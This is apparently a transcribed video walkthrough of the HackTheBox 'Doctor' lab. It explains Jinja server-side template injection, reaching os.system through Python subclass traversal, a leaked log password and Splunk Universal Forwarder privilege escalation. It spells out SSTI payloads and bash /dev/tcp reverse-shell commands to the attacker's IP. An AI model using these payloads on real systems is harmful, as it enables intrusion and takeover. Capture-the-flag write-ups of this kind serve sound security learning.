Hey guys, it's Ryan, and today I'm going to be showing you how to do Doctor from HackTheBox. This is a very interesting box. The initial foothold is intended to be server-side template injection. From there, you grab a password from a log file, pivot to a different user, and exploit a vulnerability in the Splunk Universal Forwarder to get roots. There actually is an unintended method to foothold this box, but I'm not going to be getting into that in this video. I'm just going to be talking about the server-side template injection and explaining that to the best of my ability. If you're interested in the unintended method to get foothold, go check out IppSec's video. He actually did this box blind and did the unintended method without even realizing that it was unintended until afterwards, so that was cool to watch. With that said, I'm just going to jump right into it. So the first thing I'm going to do is I'm going to make a new tab. I'm going to rename that tab to be the IP address of the box, which I believe is 10.10.10.209. I'm going to jump back over here. I'm going to cd into a folder called Doctor that I made earlier, and we're just going to run an nmap scan. So minus sc for scripts, minus sv for versions, minus v for verbose, minus on for output normal format, nmap scan, and then the IP address of the box. Enter my password, and we're off to the races. So right away we can see that we have port 22 SSH and port 80 the web server open. There's also port 8089, which is actually going to be that Splunk listener. So we're going to delve into that a little bit later, but for the meantime, let's go ahead and check out port 80. So if we head over to the box, 10.10.20, that's 298.209. And we are greeted with this lovely web page, beautifully designed. And if we go ahead and we look around this web page, we'll notice that most of these links are dead. They don't actually go anywhere. That's pretty much the case for almost all of this. If we tried to enter something into this newsletter, we get nothing. But these pages up here, there actually are these 4 pages, which if you look in the bottom left, you can see go to departments.html, about.html, blog.html, and contact. Now, all of these actually bring you to the same exact page. They're all identical. So we can just go to one, and you'll see that you get to this new page. And then if we go to blog, you'll also see that it's that same new page. Now on this page, there's actually a very useful tidbit of information. There is this email, and that email is info@doctors.htb. Now that's useful because it tells us that the host name of this box is doctors.htb. So we can go ahead and we can add that to our hosts file and see if by going to that host name, if we end up on a different vhost and maybe see something different. So let's go ahead and try to get to doctors.htb, and we're greeted with this lovely Doctor Secure messaging screen, which is different than what we had before. So we can go ahead and try to register here, and we can just go ahead and put whatever we want. So I'll do this, and it says your account has been created with a time limit of 20 minutes. So we have 20 minutes to do what we need to do before we probably would need to create a new account. So let's go ahead and log in with that account that we just created. And we're greeted with this blank little screen here. So we can go to account here, we can see our username and the email we tried. We can go to new message, and we have this new post, so we could just see if anything works there. And it seems like, yeah, we can actually go ahead and post stuff. If we go here, we can see that it's post number 2, so we could go ahead and look at post number 1 and see what that is. And it's Dr. Blog, a free blog to share medical knowledge, be kind, and it's by the admin. If we go to the admin user, we don't really see much, and that appears to be about all we see at the moment. We can go in and check out what Wappleizer tells us, and Wappleizer tells us that this is using Flask, so that's very useful information to know, but we don't really see anything else. So we could go ahead and try to do a Gobust on this. So in order to do that, we're going to want to grab that cookie so we can get past that login screen. So let's just send a request over to Burp real quick. So we can grab the cookie, go ahead and copy that, jump back over to the terminal here, and we can do gobuster dir -u http //doctors.htb -w/user/share/wordlists/derb/common.txt -c for the cookie, and we can go ahead and just paste that in there. Send that off to the races. And we see the account, which we already knew about, but we also see a /archive, which we hadn't seen before. So let's go ahead and just see where that takes us. I'll just go to a new tab here, and it's very useful if you kill the proxy so we're not on burp anymore. All right, let's go back to the site and let's try /archive and see what that gets us. It is a blank page, so let's go ahead and see if we get anything in the source, and we do, and we actually see something pretty interesting here. You'll notice that the thing I typed in earlier, the title showed up here, ADASDAS, So ADASDAS, that's what's here. So maybe if I change this, let's go ahead and change this to be like Ryan is the best, and we post that. Does this change as well? And it does. It changes to Ryan is the best. So it appears that whatever we put in here shows up here. Now, at this point, you may or may not recognize this as server-side template injection. You probably do, since I mentioned it earlier, but maybe at this point, doing the box, you might not actually know that this is server-side template injection, and you might not know what server-side template injection is. So I'm going to do the best I possibly can to go ahead and explain that, and then we'll move forward with the box. So before further ado, let me go ahead and try to give you my best attempt at explaining what server-side template injection is. So server-side template injection is a way of displaying dynamic content on a web page, and it's often used in content management systems to make it easy to create pages with static content that also have some dynamic content. So imagine this, for example. I have some h1, and that contains hello, and then some curly braces, username, some more curly braces, and then an exclamation point, right? And then we can close that h2 or that h1 tag. Now, template engines and CMSs that use template engines and templating in general, what they would do is they'll see this and they'll say, all right, so you have this h1, it has hello in it, and then it also has this template here for username. So what I'm going to do is I'm going to replace, instead of actually just showing the person, the client, the person who's requesting the website, instead of just showing them these curly braces and the word username, I'm going to replace this to be the username of whoever's currently logged in. So if I go to the website, I see hello Ryan, right? And if Bob goes, he sees hello Bob, and if Sally goes, she sees hello Sally, so on and so forth. And this is a very basic example, but this is the core of what templating is. It's having some template tag in your content that gets dynamically replaced with different content by your templating engine. Now, that is actually really useful. It's amazing. It makes web development really, really easy in some cases, but it can also be very dangerous if your templating engine evaluates things. So, for example, sometimes with certain templating engines, whatever in this actually gets evaluated. So if the user can control what goes here, if this is user-controlled input, if I can specify what goes here, I can specify code, and that code might get evaluated. If I did 4 times 4, it might show me hello 16. So let's actually go ahead and try that. What happens if I do 4 times 4? And by the way, the reason I'm using these two curly braces is because earlier I identified that the web server is Flask, and Flask uses Jinja as its templating engine. And in Jinja, the way that you format a template when you want to do like an expression, control flow is different, but for an expression, it's just these two curly braces. So let's go ahead and see if I can actually evaluate things, right? So I put that there. If we go back to the archive and we refresh the page, it does evaluate. It evaluates to 16, which means technically we just got code execution. That's very interesting in and of itself. So how could we get a shell from this? How can we take this, abuse it to get a shell? And the answer is well, we can just run Python code using this. This is a Python server using Jinja, and so it will take Python code. We can actually evaluate Python code in this. I can do some examples. Depending on what you want to do, you actually have to change whether or not you're using these two curly braces or maybe a curly brace and then a % sign and then like that to close it. Depends on what you want to do, but I could actually do right now, oops, that's not what I wanted. I could do like hello plus world, and I could add 2 strings together, and that should run perfectly fine. That's just Python. So if I go over to the archive and I refresh, yeah, you can see hello world. And just added those 2 strings together. So how do we get code execution here? Well, if you know Python, you know that you have OS.System, and OS.System can do system calls. It can run command line commands. Bash, you could do a typical bash reverse shell. You could do whatever you wanted. But there's one problem with that, right? The problem with that is that Jinja and most templating engines limit what you can do. And one of the things that you're not allowed to do is you can't import things. Importing is a big no-no. So we actually, if we tried to import something, we would not be able to do it. It would fail. So how can we use OS, which is a module that we need to import, to get us a shell in the box if we cannot import OS in the first place? And the way that we can do that is we can exploit the nature of Python itself. And that is my default ringtone on my phone going off. Anyway, where was I? Right, we can exploit the nature of Python itself, and I will explain what I mean by that. So our little dirtbuster here is done. We'll go over to a new tab, and let's just pop open Python 3. Let's take a step back, and let's learn a little bit about Python. In Python, everything is an object. And I mean that literally. Everything is a subclass of the object class. All things that exist in Python at some point lead back to objects. So what the hell am I saying? What does that even mean, right? So let's say we have hello, right? It's hello. What is the type of hello? If I do type hello, what is the type? It's a string, right? I can also figure out what the type of hello is by doing this. By dot underscore class underscore. And I get class string, right? But the class string is actually a subclass. And what is it a subclass of? Well, it's a subclass of its base class, and that base class is the object class. Everything is an object in Python. Everything leads back to object. All instantiations of objects are also instantiations of the object class. They're all objects. So what the hell does that even mean? What are you talking about, Ryan? What the hell do you mean everything is an object? You just showed us that it's a string. Well, if I look at it again, and I do base, what you'll see is it's class object, right? So hello is a string, but string is actually a subclass of object. And this is the case for everything. If I do this dot class, these two parentheses, that's a tuple. But then if I do that same thing, but I get its base class, it's an object. And this is true for literally everything. The only thing that this isn't true is the object class itself. If you try to get the base class of the object class itself, obviously object's not a subclass of object, but object is object, so literally everything in Python is an object. Now, why the hell does any of this matter? Why does it matter? Ryan, you're going off on a damn tangent. What are you talking about? Where are you even going at here? Well, the reason this is important, right? The reason that this matters is because if I can get to the object class, as I've done, and everything in Python is a subclass of object, then I can, through the object class, reach any subclass, which means I can reach anything that's built into Python through the object class. I can eventually drill down into anything that is included that is a built-in in Python. There are built-ins in Python that call OS, that import OS, and if we can call something, if we can drill down into something that imports OS for us, well, then we don't really have to, we don't have to import OS ourselves, do we? So how do we do that? Well, I can do this. Ooh, there's an extra L there. I can do this. And this is actually a function. And if I do that, I get all of the subclasses. All of the subclasses for object, we can go ahead and see right here. And this is actually a list. This command here returns a list. And this is very useful, right? This is cool. I have all these objects. Now, somewhere buried in here, there is warnings. There is the warning subclass, and the warning subclass, if you actually go and you were to look at the code for it, oh, it's right here, warnings. If you were to look at the code for this, you'll see at the top, this actually imports OS. So if we can drill down into this, we can go ahead and from there extract OS and then run our OS.System and then get our shell. Now, I actually happen to know the index for warnings. It's 138. The problem with that is that offset will change. That offset will not be constant. It will vary from system to system. It'll vary almost pretty much on everybody's system. It'll depend on your Python version, what you have installed, your operating system, everything. There is very little chance that this ends up being the same version, the same offset. So you can't count on that. You cannot count on the fact that it's going to be 138 on the server just because it's 138 on my computer. So we have to have some way of calculating that offset on the fly, figuring out what it is, or pulling the actual subclass that we want, which is warnings, from this big mess, regardless of where warnings is in this big mess. So the way that we could do that, there's actually a few ways. The somewhat typical way that we could do that, or the inline way, the nice, neat inline way that we could do that, is we could just do some if statement that checks if it's there. But before we do that, before we drill down further into how we get this offset, let's just go ahead and look at how we get OS, right? Let's figure out that first. Let's figure out how we get OS from here. So we can extract init, and then we can from there grab the globals and for this subclass, and in the globals you will find sys. From there we can grab its modules, OS. Oops, I made a typo. OS, and I'll just go ahead and make this bigger. OS. And if I run that, you can see we have the module OS from user/lib/python 3.8/os.py. And in fact, if I do then .system ID, I get my system ID, I get all the wonderful information. It's great. Now we know how we extract OS once we figure out that offset. But how do we figure out that offset? Well, you could do it inline, right? You could say I for I in tuple, and then class, globals, and so on and so forth. You get the point, right? You could do that. But the problem is if you actually try to put that into the templating engine, if you try to go over here to Jinja and you try to put that in there, you're going to have a bad time because it's not going to like it. It doesn't like that. Jinja has a specific way that it wants you to format your code, and you're going to want to use different template tags depending on what you're doing, and control flow is different than expressions, yada yada yada. So what we actually want to do is the easier way and just break that up into a multi-line function here. So how would you do that in a multi-line function? Well, you would just say for I in our sum list. In this case our sum list is going to be this like subclasses thing here. So you just say for I in sum list if warnings in I, and then we would do I init globals, etc., etc., etc. You get the point. So that's what we need to do. All right, so we need to take that and we need to put it into a way that Jinja will like, and this is probably expired. It has not expired. So what is the way that Jinja will like it? Well, for control flow in Jinja, you want to do one of these. You want to do a curly brace and then a % sign. So if we do a curly brace and then a % sign, we can then we can actually break these up. We can do multi-line functions by just doing multiple of these in a row, and it will just treat them as a new line instead of tabs. We can break each statement up using this nice templating that we have. And you can actually go and you can Google this. You can Google Jinja templating. And there is the documentation. It goes ahead and explains exactly how it works and when you want to use which templating styles, etc., etc. But for now, you can do this curly brace and a % sign, do some control flow, and we can say for I in a tuple class dot base dot subclasses % sign curly brace, and we can do it again. If warnings in I name % sign curly brace, and then once again. Now we're no longer doing control flow. We have our for, we have our if. We're out of control flow now, so now we're back to using two curly braces, right? We can do I init dot globals, and then sys modules OS.System, and then we can put our reverse shell. .10.10.14.45/9999, and then we can do a arrow again. Close that and close that. Now we actually have to specify that we have to close our for and our if. So we have to close our if first, and if, and we also have to close our for loop and for, because remember we don't have any tabbing in here, right? There's no tabs, so we need to tell this templating engine when to end the for loop, when to end the if statement, and etc., etc., etc. But now we have our payload. And there actually is a version of this on the payload all the things. So if I do payload all the things Jinja, and we go to payload all the things server-side template injection, we can scroll down, and for Jinja 2, there is actually a sort of similar command here that you can look at, and you can see all the basics here. And we could modify this, but I feel like it's actually better if we make it ourselves. That way we can understand what's happening with this big, long, and scary looking payload. But now we have it. So this should run, even though it probably won't, since our 20 minutes are probably up. But we'll go ahead and we'll start a netcat listener just in case, and I'll post that. Oh, and it looks like we have not run out of time yet. And it looks like I made an error. Where did I make an error? Because it gave me this, we're experiencing trouble on our end, error 500. So I have made an error. So let's see where I made an error. And I didn't do for in, so that should be for in. Now if we go back over here, and it looks like it just loads forever, and we have our shell on the box. So that's actually how you do the Foothold for Doctor. I think it's pretty cool. I think the really cool thing is understanding that this Python namespace stuff, how you can reach OS or most other modules by just delving through all of these built-ins and finding something that imports what you need. That's pretty cool. But we have a shell on the box now, so we can go ahead and we can PrevEsk. Let's go ahead and do that. Let's just look around. Let's see, we have blog.sh here. We have all that stuff. We could go ahead and we can look around for a bit if we want to, but I'm just going to go ahead and maximize that. I'm just going to go ahead and get us some linps on there, so that way we can run linps and see what we see. So if I cd toolbox/PrevEsk, and then I do python 3-m http.server, that will start up a Python server. Over here, I can do wget 10.10.14.45 port 8000/linps.sh, and we have linps. So I do a gmod +x linps.sh, and then I can run it. And before I run it, I'm just gonna move this over so I get the width of the output, and off to the races. Okay, so now that linps has run, we can see right away that we do have Splunk Forwarder on the box right there. But if we go ahead and we scroll up, eventually we might see something interesting. If we scroll up to here, finding passwords inside logs, we see this weird thing here, reset password, email, guitar123. So that's a bit weird, right? Guitar123 is not an email. So it looks like maybe someone accidentally typed in their password instead of their email in the password reset. So if we were to go ahead and we just looked at the home directory, we see that we are web, and there's another user, Sean. So if we try to su into Sean, and we give it guitar123, and it looks like it hangs, but it doesn't actually hang. So we type in who am I, we see that we are Sean. So we can do our typical python 3 -c import pty.spawn bin /bash, and there we go. We are now Sean. We could run linps again, but we actually don't need to because we can see that Splunk Forwarder is running on the box. So if we go back over here to the web browser and we just Google Splunk Forwarder exploit, we can go ahead and look around and we see an article about Splunk Universal Forwarder hijacking. And there's also this GitHub for privilege escalation, Splunk Universal Forwarder misconfigurations, and we can look at this. So, local priv escalation or remote code execution through Splunk Universal Forwarder misconfigurations. And it says if you have a local shell on a Windows computer, you can use the sharp Splunk Whisperer 2, otherwise Pi Splunk Whisperer 2 local, but you can contact the Splunk UF API HTTPS port 8089. Hey, that's that port that we saw earlier if you have the credentials. And it looks like we actually do have credentials, right? Because we know the Sean user has the password of guitar123. So if we make a clone of this Git branch here, this Git repository, and we just go ahead and I'll just make a new tab here, and I'll cd back into boxes/doctor, and I can do a git clone of that. ls, we'll cd Splunk Whisperer, ls, we'll cd Pi Splunk Whisperer ls, and there is a Pi Splunk Whisperer 2 _ remote.pi. So let's try that. So let's do Python 3 Pi Splunk Whisperer remote.pi -h. Oops, I have spelt something wrong. What did I do wrong? Pi Splunk Whisperer 2 remote.pi. All right. And we can see our help thing here, and we see that we can specify the host, the port, the lhost, the lport, and username, password, and the payload. So let's go ahead and try that, right? So let's try host is doctors.htb. The username is Sean. The password is guitar123. The lhost is 10.10.14.45, and the payload will be, we can do bash -c bash -i /dev/tcp/10.10.14.45/9999. Oops, and I think I have actually messed this up already. Yes, I have. This is actually bash -i ampersand, and then back over here, 0 arrow ampersand 1. Close that, and I'll just go ahead and I'll set up a netcat listener and c -lvp 9999, and we can go ahead and try to run this. And aha! It took a second there. I thought I made a mistake. It took a second there, but we have roots. And there you go. Now we are root. Yeah, we're done. That's it. That's the entire box. So, what did we do? We did template injection. I tried to poorly explain what template injection is and talk about Python namespaces and how you can import things even if you can't use imports. And then we grabbed a password from a log file, pivoted, and then we just used a very simple script to go ahead and exploit the Splunk Universal Forwarder to get us a shell as root on the box. And that is it. I apologize if this video was a bit rough. I am recording this on very little sleep. It is 10 in the morning and I have not slept because I'm trying to fix my sleep schedule at the moment, so I apologize if it was a bit rough. But if you enjoy the video, go ahead and subscribe. I'm going to be trying to do a lot more content. I'm going to try to be doing some challenges as well as just explaining pen testing and InfoSec concepts in general. So if you enjoyed, hit subscribe. Maybe go check out the links below where you'll find more information about all of these subjects that we talked about, and the link to my HackTheBox profile if you want to give me some respect. But with that, have a fantastic rest of your day, and I hope you enjoyed the video.